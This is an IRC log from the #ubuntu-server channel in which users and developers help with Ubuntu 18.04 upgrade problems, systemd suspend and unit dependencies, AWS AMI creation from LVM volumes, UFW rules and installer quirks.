<nacc> also, why are you running NM on a server? :)
<mustmodify_> I did check my power settings.
<teward> nacc raises a good point
<teward> why're you using Network Manager on a server
<mustmodify_> nacc: I have no idea. I had server (plus a light-weight GUI) running on this machine with 16.04 for years.
<nacc> mustmodify_: my understanding is that it's not NM itself that's suspending your system, it's NM reacting to a sleep trigger, meaning your system is suspending
<mustmodify_> Then I just installed 18 and things are all messed up.
<nacc> e.g., https://unix.stackexchange.com/questions/64151/networkmanager-disabled-network-when-sending-system-to-sleep
<mustmodify_> networking, going to sleep, ...
<nacc> mustmodify_: installed or upgraded?
<teward> nacc: that's what I thought it was, NM reporting it saw a sleep trigger.
<nacc> teward: yeah, the message is vaguely misleading, but i think so too
<nacc> i would look just before it in the syslog, but that's not in the gist
<teward> indeed
<nacc> mustmodify_: more logs, please? :)
<teward> And some coffee while you're at it :)
<mustmodify_> updated gist, not much helpful in syslog
<nacc> cpaelzer: rbasak: sorry for not helping at all with php this cycle... I see 7.3 is in universe. Do you want me to try and help get 7.3 into main next cycle? I know the general steps, or at least we can tagteam it, if we can do a sync/HO beforehand
<mustmodify_> Should I remove network manager? Anything I don't need can go, IMO. Just trying to get my system to something that will be stable after this upgrade to v18.04
<rbasak> nacc: that sounds good. Thank you for helping out!
<nacc> mustmodify_: i don't see why you need a GUI :)
<nacc> rbasak: ack, if you want to throw something on my calendar for the future, feel free, or we can sync here when there's more free time
<teward> nacc: wrt not helping with PHP, we're all busy, NGINX help last cycle from the rest of the server team was EXTREMELY helpful for me, with heavy work load, so I'm sure we're all good for helping each other out as needed :)
<teward> (just glad you're checking in on it all :P)
<nacc> teward: yeah, there's just a maze of dependencies from debian that are in universe that have delta because of phpunit at the time (18.04)
<nacc> and then php itself with phpunit, etc.
<teward> nacc: welcome to Debian Hell.  *shot*
<nacc> lol
<mustmodify_> nacc: thanks, let me explain. I wanted a heads-up place to show my clients' sites statuses and stuff. And I had this monitor connected to the machine, so...
<nacc> mustmodify_: couldn't that be done via a site?
<mustmodify_> I figured showing a webpage on that monitor wouldn't use up too much in the way of resources.
<nacc> mustmodify_: and if it's a site, why does it need to be local?
<mustmodify_> It's not local.
<nacc> mustmodify_: i mean, local on a monitor
<mustmodify_> Well I'm not sure what you mean by that
<nacc> mustmodify_: it doesn't make sense to me to go from -- display site status on a website to run a desktop on the server so i can have a monitor hooked up to it
<teward> ^ this
<teward> unless you were looking for an always-on screen showing you the status
<mustmodify_> right
<mustmodify_> that's what I was trying to say.
<teward> in which case you can just have something running a website and have *another computer* or an RPi connect
<teward> and then just show the data that way
<mustmodify_> fine. So if I uninstall this GUI, will any issues be resolved?
<mustmodify_> because being productive is more important to me right now than visibility.
<mustmodify_> This is a dev machine. I remote into it to use vim to program, so I certainly don't need a GUI.
<nacc> mustmodify_: well, the thing is, why is it suspending? that's what you need to debug
<nacc> yes, i think it 'might' fix itself when you remove desktop services
<nacc> e.g., i think gnome's default is to suspend after some X minutes in 18.04
<mustmodify_> I checked the power settings, they're set not to suspend.
<mustmodify_> So I don't know.
<nacc> mustmodify_: in gnome?
<nacc> iirc, there's a kernel level switch to disable suspend as well but i might be wrong
<nacc> mustmodify_: i'm only going on what your logs say, which is you are still suspending :)
<mustmodify_> I'm still suspending. That's true.
<nacc> so the first step is basically just figure out how to flat out disable suspend
<mustmodify_> I went into settings > Power > suspend in the GUI and disabled it. I'm checking for gnome command-line stuff now.
<mustmodify_> I hadn't thought of that, let me google.
<nacc> mustmodify_: https://unix.stackexchange.com/questions/188774/disable-suspending-at-kernel-level-independent-of-distribution-de-and-logged-u ?
<mustmodify_> yeah, that's interesting. I don't have an org.freedesktop.upower.policy file.
<nacc> that is an old response, so it may or may not be correct
<nacc> https://wiki.debian.org/Suspend#Disable_suspend_and_hibernation
<nacc> that acutally might be best
<mustmodify_> I had found another post with a similar instruction.
<nacc> disable suspend in systemd, as that's what is logging a suspend event in your syslog
<mustmodify_> nice... "created symlink (various files) -> /dev/null
<mustmodify_> well, we'll see what happens.
<mustmodify_> nacc: thanks
<nacc> mustmodify_: gl!
<mustmodify_> thanks.
<tych0> smoser: hallyn: so https://docs.aws.amazon.com/cli/latest/reference/ec2/register-image.html says we can create it from a "snapshot of the root device volume", but our volume's root device is in lvm. at least when i tried via the UI, it didn't seem to want to let me do that
<tych0> smoser: hallyn: gonna try some fiddling with the cli, but if you have any pointers about using lvm vs. just a rootfs on an image, that would be helpful :)
<dlloyd> aws has no visibility into anything you do with LVM, so if you want disk level operations to make sense you should use straight volumes
<tych0> dlloyd: meaning we can't create an AMI where the root partition is on lvm?
<dlloyd> you can, it will just contain the full volume
<dlloyd> i am assuming you are using lvm to sub partition that volume?
<tych0> dlloyd: not sure what you mean by "it will contain the full volume". we have a disk0p1 which is the boot partition, and disk0p2 which is an lvm pv with various lvs, one of which is /
<dlloyd> right, so if you generate an AMI from that volume, it will contain everything on disk0, so both of those partitions
<tych0> oh, yeah, that's fine
<dlloyd> think of aws volumes as a physical disk
<tych0> yep
<tych0> but it's not clear to me that we actually can generate an AMI from this volume
<tych0> or at least, i don't understand how right now :)
<dlloyd> root device volume to AWS is just the disk it should attempt to boot from, so if your partition configuration is correct you should be set
<tych0> but it wants to name it /dev/sda1
<tych0> i think maybe i need to figure out the cli
<smoser> tych0: https://docs.aws.amazon.com/cli/latest/reference/ec2/register-image.html?highlight=register%20image
<tych0> smoser: yeah, that's what i've been reading, thanks
<smoser> is what you're after. from the cli. i'm not sure of an example commadn line for block device mapping for hvm
<tych0> smoser: yeah, so i have,
<tych0> http://paste.ubuntu.com/p/smb5v4fZNB/
<tych0> but it says, No root snapshot specified in device mapping.
<tych0> we don't have a root snapshot, since it's in lvm :\
<mustmodify_> OMG more 18.04 issues. Git tag now uses less (or something) by default. Can I turn that off?
<nacc> mustmodify_: --no-pager?
<nacc> mustmodify_: see `man git-tag` and saerch for 'pager'
<nacc> mustmodify_: that's not an 18.04 issue, that's an upstream change, maybe.
<mustmodify_> nacc: Maybe, but it wasn't happening before the change. All bad things happen on update! :P
<nacc> mustmodify_: right, there's no 'no behavioral changes' on update assertion
<nacc> and git, in particular, has no ABI about it's cli
<nacc> ABI equivalent, i mean
<Skuggen> Git is at least consistent in its inconsistency
<nacc> heh
<mustmodify_> nacc: ABI?
<mustmodify_> should probably google it first, one moment.
<nacc> mustmodify_: Application Binary Interface, the 'handshake' applications depend on to know how to talk to interfaces
<nacc> mustmodify_: i was using it as a vague way of saying you can't rely on cli behavior of git
<nacc> mustmodify_: unless you have it configured to only produce specific behavior
<nacc> the 'defaults' can and do change
<mustmodify_> So close, google. And yet so far to go.
<mustmodify_> https://media.trillian.im/media/?m=aW1hZ2UvcG5nLDEwMTQsMTczLL91O2MF2ITRLg%2B69IY%2BF3G5dgSXW2qt9f6FTaG4C4dy
<mustmodify_> anyway, ok, kind of like an API but for CLI stuff.
<mustmodify_> and more passive, probably.
<nacc> mustmodify_: ABI is stricter than API
<mustmodify_> well, depending on how you look at it.
<nacc> mustmodify_: ABI means you don't need to recompile your program to use a library
<mustmodify_> right, nm about that. Still thinking it through.
<nacc> mustmodify_: in any case, the gist was about ABI or API :)
<nacc> mustmodify_: there isn't one to a cli program, unless they assert there is one. And git, in particular, does not
<mustmodify_> ok. More interesting question. If I have WantedBy=xxx.service at the bottom of my systemd service, does that mean that when xxx starts, I'll also start?
<mustmodify_> Or is it more an "abort if not present" thing?
<nacc> mustmodify_: `man systemd.service` :)
<nacc> err, systemd.unit, maybe
<nacc> yeah, that one, sorry
<mustmodify_> Wants and WantedBy seem backwards to me.
<mustmodify_> If I understand correctly, if you have (just as an example) a Power service and an Air Conditioner service, Air Conditioner would say WantedBy=Power
<mustmodify_> but in fact the Air Conditioner wants power, it isn't wanted by the power.
<mustmodify_> Maybe I'm misunderstanding, but that's how I read it.
<nacc> AC has wantedby=power mens that power.wants will have a symlink to ac. so if you start power, it will start ac.
<nacc> wantedby i a means of expressing dependency: "if possible, when i start power, i want to start ac"
<mustmodify_> I get that. But the words seem backwards. Because, as I said, AC _is not_ wanted by Power. Rather, AC wants power, and Power is wanted by AC.
<nacc> mustmodify_: it is improtant to not confuse english with systemd
<nacc> mustmodify_: they are both grammars
<mustmodify_> LOL
<nacc> don't apply english semantics to systemd terms
<nacc> i'm not actually joking
<mustmodify_> Well it can be both true and unfortunate, right?
<mustmodify_> I mean, they are both grammars. But if the grammars happened to line up, then that would have been more intuitive for potential users.
<nacc> mustmodify_: i meant in your sentence: "Because, as I said...". That's english phrasing
<mustmodify_> right
<mustmodify_> totally.
<nacc> mustmodify_: you can express a desire in english. the syntax to achieve the same in systemd will be whatever systemd wants :)
<mustmodify_> well it's more definition than grammar but
<nacc> it's confusing, for sure
<mustmodify_> right
<nacc> but once you get it, it makes sense (some small amount)
<mustmodify_> I gotcha
<mustmodify_> It's systematic. I'll give it that. And a word having that meaning is fine. The choice of that word... I don't think it makes sense. :)
<mustmodify_> c'est la vie
<nacc> mustmodify_: yeah, exactly
<sdeziel> nacc: would you mind setting https://bugs.launchpad.net/ubuntu/zesty/+source/php7.0/+bug/1724896 as "won't fix"?
<ubottu> Launchpad bug 1724896 in php7.0 (Ubuntu Zesty) "[MRE] Please update to latest upstream release 7.0.25" [Undecided,Fix committed]
<nacc> ack
<sdeziel> Zesty being EOL
<sdeziel> thanks
<nacc> done and comment added
<sdeziel> "git ubuntu clone php-mcrypt" fails for me and says the repo is not imported yet. Wasn't 100% of archive imported for git-ubuntu consumption?
<nacc> only main
<sdeziel> ah, that explains it
<tych0> smoser: got my thing to boot. thanks for all your help today.
<tych0> smoser: i owe you one unit of beer in EDI :)
<cpaelzer> nacc: I'd think we would love a helping hand to not learn all again the hard way
<cpaelzer> we all have odd times these weeks, but then we are quite a bit away from 19.04 atm
<cpaelzer> nacc: we should sync via mail to get all involved and find sort of a kick-off session together
<cpaelzer> nacc: I'll start a mail thread - thanks!
<nacc> cpaelzer_: ack, ty
<dar123> hey guyz, i am doing bind config for the first time. I  added two domains, first one works fine. Second one still showing public name server. I even removed the forwarder
#ubuntu-server 2018-09-27
<smoser> tych0: \o/
<cpaelzer> good morning
<lordievader> Good morning
<jrwren> using this filter: 'google us-east1 20180920' on https://cloud-images.ubuntu.com/locator/daily/ I can see that I should use daily-ubuntu-1804-bionic-v20180920 as my image name in GCE, but what is the name of the ubuntu image-project in GCE?
<fdelgado> Hi people!
<fdelgado> Some of you knows where to download a good manual for linux?
<sarnold> fdelgado: the server guides have downloadable PDFs https://help.ubuntu.com/
<genii> For general linux knowledge, the Linux Documentation Project is also a good resource. https://www.tldp.org/
<Futurian> The server guides are exceptional in my opinion..
<jrwren> i agree. Ubuntu Server Guide is a treasure.
<guardian> hello, I'm surprised I install ubuntu server but it didn't ask nor configure the timezone
<guardian> is it expected?
<guardian> can this be caused by having no DHCP on the VLAN from which I intalled ubuntu server?
<jrwren> most servers run configured to UTC, so I would guess that it is by design.
<guardian> k
<guardian> then I've things to learn
<guardian> why are they configured to UTC?
<maxh> Does anyone know if OpenSSL 1.1.1 will be in Cosmic? (Or, more specifically, if TLS 1.3 will be supported?)
<sdeziel> maxh: it will as it's in -proposed already
<sdeziel> maxh: I've also heard that it would eventually be backported to Bionic for TLS 1.3 enablement :)
<maxh> Excellent! :D
<sarnold> ahasenack: congratulations :)
<ahasenack> sarnold: thanks! :)
#ubuntu-server 2018-09-28
<teward> hmm... i think i found a bug in the 18.04.1 live ISO... it has a 250GB disk available to it but when i tell it to use the whole disk for LVM it failed to set the LVM root to use all the space :|
<teward> that's... interesting.
<guardian> is there a way of avoiding creating a local user when installing ubuntu server?
<guardian> all my users are going to be defined in AD anyways
<lordievader> Good morning
<andol> guardian: If you lower the debconf priority on the installer I think you'll get the option of setting a root password rather than creating an initial user.
<guardian> andol: that's interesting, so it means I have to modify the installer first?
<guardian> andol: or is it accessible from the menus?
<andol> Should be a menu option somewhere
<andol> Mostly been installing cloud images, etc recently, so don't quite have the iso installer infront of me.
<guardian> k will try the iso again, as I didn't see any menu
<andol> Might be early on, with one of the menus you can access using F4 or F6, I seem to recall.
<guardian> thanks for the hints, will try :)
<andol> By the way, this is the classic Debian ncurses installer I'm talking about. No idea how the new fancy server installer behave.
<ahasenack> good morning
<caseyd> I'm having a kind of weird issue with UFW. I have this rule, which should allow something but its being denied. Am I missing something?
<caseyd> allow from 172.16.0.0/16 to 10.38.8.10 port 443
<caseyd> Sep 28 11:22:02 oec-intra kernel: [9685260.839998] [UFW BLOCK] IN=eth0 OUT= MAC=00:15:5d:0a:c0:3d:14:18:77:04:f6:02:08:00 SRC=172.16.10.6 DST=10.38.8.10 LEN=40 TOS=0x00 PREC=0x00 TTL=127 ID=20245 DF PROTO=TCP SPT=64942 DPT=443 WINDOW=0 RES=0x00 ACK RST URGP=0
<jrwren> maybe there is another rule, before that one that is blocking it?
<sarnold> definitely check all the rules
#ubuntu-server 2018-09-30
<mybalzitch> I sure do like the Ubuntu server installer
<deemand> I can't install Ubuntu Server 18.04 on a machine with no enabled network card. Is this a known issue, or is there a way I can work around this inconvenience?
<deemand> It doesn't work with 18.04, the installer will throw me in a loop. However, I got it working with the less fancy 18.10 installer.
<teward> deemand: if you are using the 18.04.1 live installer, then yes, that won't work it needs networking to work.  If you're using the 18.04 alternate installer it should work
<deemand> teward: It doesn't mention that it's a live installer on the download page. It's a 800 MB image, it shouldn't require a network connection just to set up a system. If I had wanted that I would have picked the network install image. This is not a feature.
<teward> deemand: i didn't create the ISOs, don't shoot me :P
<teward> I'm not a fan of it either, but I work with mostly VMs nowadays, so I just created one VM with the ISO and clone that template around :P
<deemand> The bad thing was that the installer didn't even give feedback. I also missed the feature to set up a KVM host at install time. I'm not sure why that was cancelled either. And I really don't shoot or aim at random people.
<tomreyn> the network requirement is bug 1750819
<ubottu> bug 1750819 in subiquity "Impossible to install without network" [Undecided,Triaged] https://launchpad.net/bugs/1750819
<tomreyn> deemand: ^
<deemand> tomreyn: Thank you. I see it's all been discussed before, so the community is aware of that matter. It's alright then.
